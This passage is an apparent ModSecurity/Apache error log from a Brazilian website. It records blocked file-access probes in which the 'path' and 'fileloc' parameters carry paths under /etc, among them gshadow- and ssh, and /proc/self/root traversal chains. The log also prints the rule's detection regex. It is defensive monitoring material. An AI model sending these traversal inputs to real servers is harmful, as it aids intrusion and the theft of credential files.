"/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6wF0L0L-SsrnPo5KcwAAAsg"]
[Fri Mar 20 05:31:39.315066 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.20:57634] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6xCii7xarUs8iHZJngAAAg4"]
[Fri Mar 20 05:31:39.664892 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.96:57642] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6xCii7xarUs8iHZJnwAAAg0"]
[Fri Mar 20 05:31:39.822615 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.241.31:45048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F67ninkcc-iUj5ApBNQAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:39.884277 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.101:57664] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F6xCii7xarUs8iHZJowAAAhY"]
[Fri Mar 20 05:31:40.611457 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.99:57730] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7F1pVZ5mVmJwsFMSRgAAAFM"]
[Fri Mar 20 05:31:40.953499 2026] [:error] [pid 11167:tid 140411548894976] [client 57.141.18.79:57750] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7PHIg5MgXLBnicPcJAAAAdc"]
[Fri Mar 20 05:31:42.697952 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.123:57800] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7vHIg5MgXLBnicPcJgAAAcE"]
[Fri Mar 20 05:31:42.714741 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.89:57790] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7ta6ubjKNq_cu4az-wAAA0k"]
[Fri Mar 20 05:31:42.715021 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.104:57764] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7fqxLDW4GITHUkTFXAAAARU"]
[Fri Mar 20 05:31:42.734860 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.43:57776] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7da6ubjKNq_cu4az-AAAA08"]
[Fri Mar 20 05:31:42.736708 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.72:57798] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7ta6ubjKNq_cu4az_QAAA0U"]
[Fri Mar 20 05:31:42.860385 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.106:57834] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F7ta6ubjKNq_cu4az_gAAA1I"]
[Fri Mar 20 05:31:43.343514 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.64:57860] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F79a6ubjKNq_cu4az_wAAA0g"]
[Fri Mar 20 05:31:44.009532 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.18:57872] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8Na6ubjKNq_cu4a0AAAAA0A"]
[Fri Mar 20 05:31:44.277920 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.112:57888] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8Na6ubjKNq_cu4a0AgAAA0o"]
[Fri Mar 20 05:31:45.078515 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.28:57956] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8fHIg5MgXLBnicPcJwAAAcg"]
[Fri Mar 20 05:31:45.422402 2026] [:error] [pid 9818:tid 140411624429312] [client 57.141.18.0:57974] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8V1pVZ5mVmJwsFMSUgAAAE4"]
[Fri Mar 20 05:31:45.425571 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.37:57976] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8V1pVZ5mVmJwsFMSUwAAAFI"]
[Fri Mar 20 05:31:45.844010 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.121:58002] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8TJ3M9BSuKP7CAb1qgAAAJY"]
[Fri Mar 20 05:31:46.113221 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.60:57894] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8ta6ubjKNq_cu4a0CAAAA0g"]
[Fri Mar 20 05:31:46.591594 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.106:58058] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8vHIg5MgXLBnicPcLAAAAdI"]
[Fri Mar 20 05:31:46.787256 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.47:58074] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8rninkcc-iUj5ApBOwAAA5g"]
[Fri Mar 20 05:31:47.411637 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.111:58112] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8wF0L0L-SsrnPo5KdgAAAsk"]
[Fri Mar 20 05:31:47.414326 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.38:58114] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8wF0L0L-SsrnPo5KdwAAAss"]
[Fri Mar 20 05:31:47.847324 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.63:58148] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F8-oXxyEfFpUF8f9kWAAAAUs"]
[Fri Mar 20 05:31:48.119004 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.15:58162] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9BCii7xarUs8iHZJqwAAAgI"]
[Fri Mar 20 05:31:48.584734 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:55614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F9F1pVZ5mVmJwsFMSVgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:48.656349 2026] [:error] [pid 11167:tid 140411624429312] [client 57.141.18.114:58190] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F9PHIg5MgXLBnicPcMAAAAc4"]
